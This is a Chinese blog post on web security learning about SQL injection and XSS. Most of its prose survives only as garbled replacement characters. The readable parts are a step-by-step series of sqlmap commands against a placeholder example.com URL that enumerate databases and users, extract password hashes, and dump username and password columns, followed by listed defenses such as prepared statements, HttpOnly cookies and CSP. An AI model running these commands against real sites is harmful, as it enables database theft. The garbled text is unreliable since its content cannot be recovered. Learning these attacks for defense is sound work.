首页 博客列表 精选博客 每日焦点 关于我
网络安全学习----1.常见攻击
发布日期:2021-05-15 02:08:40 浏览次数:26 分类:精选文章

本文共 3996 字,大约阅读时间需要 13 分钟。

SQL���������������������

SQL������������������

SQL������������������������Web���������������������������������������������������SQL���������������������������������������������������������������������������������SQLMap������������������������������

���������������������

  • --dbs������������������������������

    python sqlmap.py -u "http://example.com/tztgxx.aspx?code=115" --dbs

  • --current-db���������������������������������������

    python sqlmap.py -u "http://example.com/tztgxx.aspx?code=115" --current-db

���������������������

  • --users������������������������������������

    python sqlmap.py -u "http://example.com/tztgxx.aspx?code=115" --users

    ���������������������������������

    (1) BUILTIN\Administrators
    (2) sa

  • --current-user���������������������������

    python sqlmap.py -u "http://example.com/tztgxx.aspx?code=115" --current-user

  • --passwords���������������������������������

    python sqlmap.py -u "http://example.com/tztgxx.aspx?code=115" --passwords

���������������������������

  • --tables������������������������������������������������������������

    python sqlmap.py -u "http://example.com/tztgxx.aspx?code=115" -D ahykd_new --tables

  • --columns������������������������������������������������������������������

    python sqlmap.py -u "http://example.com/tztgxx.aspx?code=115" -D ahykd_new -T usr --columns

������������������

  • --dump������������������������������ 
    python sqlmap.py -u "http://example.com/tztgxx.aspx?code=115" -D ahykd_new -T usr -C "usr_name,password" --dump

    ���������������������������������������������������������������������������

SQL������������

������SQL������������������������������������������������

������������

  • ���������������������������������������������������������������������IP������������������������������������
  • ������������������������������������������PHP���PDO���Java���PreparedStatement���������������SQL���������
  • ������������������������������������������������������������������������������������������������������������������

    • ������������

  • Output Control���������������������������������������������������������

  • = ''������������������������������IsNull������������������������������������������

  • ���������������procedure������������������������������������������������������������������������������������������������

  • ���������������������������������������������������Validation(Request[" DropDownList ))������������

    • XSS������������������XSS���

    XSS������������

    XSS������������Web������������������������������������������������������������HTML������������������������������������������������������������

    XSS������

  • ���������XSS���������������������������������������������������������������
  • ���������XSS������������������������������������������������������������������������������������
  • DOM���XSS���������DOM���������XSS������������������innerHTML������������������������������������������ XSS���

    • XSS������������

    ������������

  • ������������������������������������������������������������������������������������
  • HTML���������������������������������������������������������������������������
  • HttpOnly cookie���������cookie���HttpOnly���������������JavaScript������cookie���������

    • ������������

  • ���������������������������������HTML���XML���������������������<script>���iframe���������������
  • ���������������������������������������������������������������SQL���������XSS���

    • ������������������

    ������������

    ���������������������������������������������������������HTML���XML������������������������������������������������������������

    ���cookie������������������HttpOnly������������������JavaScript������cookie���������

    CSP������������������

    ������������Content Security Policy (CSP)������������������������������������������<script>���������

    ������������

    ���������������������������������������������������6-12���������������������������������������������������

    ������

    ������������SQL���������XSS������������������������������������������������������������Web���������������������������������������������������������������������������������������������������

    上一篇:网络安全学习----2常用工具
    下一篇:eclipse,codeblocks导入做好的项目

    发表评论

    最新留言

    关注你微信了!
    [***.104.42.241]2025年04月10日 03时35分30秒

    关于作者

        喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
    -- 愿君每日到此一游!

    推荐文章

    skimage与cv2 安装失败的解决办法 2021-05-15
    linuxmint 上面装谷歌浏览器 2021-05-15
    windows/linux下Anaconda管理的(安装的)包的位置 2021-05-15
    关于吴恩达的深度学习的一些授课视频里面英文翻译错误的实例展示 2021-05-15
    伴随矩阵和逆矩阵的关系证明 2021-05-15
    反向传播之矩阵求导dL/dz1的求导过程 普通神经网络的逆向求导过程 2021-05-15
    numpy.linspace使用详解 2021-05-15
    突破Bias-Variance困境 2021-05-15
    CNN / language modelling and sequence generation 2021-05-15
    函数可导和可微的区别: 一元中互为充要;多元中可微是可导的必要条件,可导不一定可微。 2021-05-15
    一文说尽C++赋值运算符重载函数(operator=) 2021-05-15
    Form窗体属性 2021-05-15
    Nintendo - NES Emulators 网站 2021-05-15
    android market 开发者注册 2021-05-15
    1024程序员节 2021-05-15
    删除文件提示“您需要权限才能执行此操作”如何解决 2021-05-15
    IC封装图片大全 2021-05-15
    自恢复保险丝的选用 2021-05-15
    开关电源 误差放大器电路 2021-05-15
    Altium Designer唤出关掉的窗口 2021-05-15
    白红宇的个人博客 - 记录点点滴滴的事 - 您是第 461327693 位访客
    访问时间: 2025-05-06 01:40:18 访问IP: 52.14.228.67     Copyright © 2020 - 2025 css8.cn 京ICP备2021015314号-1 手机版